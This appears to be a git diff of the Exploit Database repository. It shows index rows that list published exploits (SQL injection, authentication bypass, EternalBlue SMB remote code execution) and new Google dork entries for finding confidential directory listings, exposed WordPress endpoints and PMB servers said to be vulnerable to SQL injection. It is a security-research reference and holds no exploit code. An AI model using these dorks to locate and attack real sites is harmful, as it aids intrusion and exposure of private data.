48647,exploits/php/webapps/48647.txt,"Online Shopping Portal 3.1 - 'email' SQL Injection",2020-07-07,gh1mau,webapps,php,,2020-07-07,2020-07-07,0,,,,,,
48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
51811,exploits/php/webapps/51811.txt,"Online Shopping System Advanced - Sql Injection",2024-02-26,"Furkan Gedik",webapps,php,,2024-02-26,2024-02-26,0,,,,,,
48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-05-31,1,,,,,,
35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
@ -30546,6 +30554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70878,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
@ -46237,6 +46246,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,"Buffer Overflow",,,http://www.exploit-db.comCloudMe_1112.exe,
44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,,2018-05-28,2018-05-28,0,,,,,,
44275,exploits/windows_x86-64/remote/44275.txt,"DEWESoft X3 SP1 (x64) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows_x86-64,,2018-03-12,2018-03-12,0,CVE-2018-7756,,,,,
51817,exploits/windows_x86-64/remote/51817.txt,"IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft",2024-02-26,hyp3rlinx,remote,windows_x86-64,,2024-02-26,2024-02-26,0,CVE-2024-22318,,,,,
42354,exploits/windows_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,remote,windows_x86-64,,2017-07-24,2017-07-26,0,CVE-2017-0059;CVE-2017-0037,,,,,https://redr2e.com/cve-to-exploit-cve-2017-0037-and-0059/
42030,exploits/windows_x86-64/remote/42030.py,"Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445,2017-05-19,2019-03-28,1,CVE-2017-0144,,EternalBlue,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2018-09-30-at-103641.png,,https://github.com/worawit/MS17-010/blob/873c5453680a0785415990379a4b36ba61f82a4d/eternalblue_exploit8.py
41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64,,2017-05-10,2018-10-17,0,CVE-2017-0148;CVE-2017-0147;CVE-2017-0146;CVE-2017-0145;CVE-2017-0144;CVE-2017-0143,,,,,

Can't render this file because it is too large.

53
ghdb.xml
View file

@ -41760,6 +41760,21 @@ Sagar Banwa
<date>2023-02-27</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>8420</id>
<link>https://www.exploit-db.com/ghdb/8420</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /confidential&quot;</shortDescription>
<textualDescription>Description-* intitle:&quot;Index of /confidential&quot;*
This google dork searches in the title of websites for the &quot;&quot;Index of
/confidential&quot;
</textualDescription>
<query>intitle:&quot;Index of /confidential&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /confidential&quot;</querystring>
<edb></edb>
<date>2024-02-26</date>
<author>Gautam Rawat</author>
</entry>
<entry>
<id>8039</id>
<link>https://www.exploit-db.com/ghdb/8039</link>
@ -51560,6 +51575,27 @@ Dxtroyer</textualDescription>
<date>2023-11-20</date>
<author>Sathish Kishore</author>
</entry>
<entry>
<id>8418</id>
<link>https://www.exploit-db.com/ghdb/8418</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</shortDescription>
<textualDescription>Google Dork:
inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;
Description:
Using this Google dork can help identify WordPress sites that have their
oEmbed API publicly accessible, which could potentially be useful for
various purposes such as content scraping, data analysis, or security
research. However, it's essential to use this information ethically and
responsibly, respecting the privacy and security of the websites you
interact with.</textualDescription>
<query>inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</querystring>
<edb></edb>
<date>2024-02-26</date>
<author>Jeel Patel</author>
</entry>
<entry>
<id>4678</id>
<link>https://www.exploit-db.com/ghdb/4678</link>
@ -116029,6 +116065,23 @@ Ahmad Al-Nounou
<date>2014-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>8419</id>
<link>https://www.exploit-db.com/ghdb/8419</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</shortDescription>
<textualDescription>The Dork Filters for PMB Services, Mostly vulnerable to SQli and handful of
CVEs
*&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)*
</textualDescription>
<query>&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</query>
<querystring>https://www.google.com/search?q=&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</querystring>
<edb></edb>
<date>2024-02-26</date>
<author>Wallehazz</author>
</entry>
<entry>
<id>6161</id>
<link>https://www.exploit-db.com/ghdb/6161</link>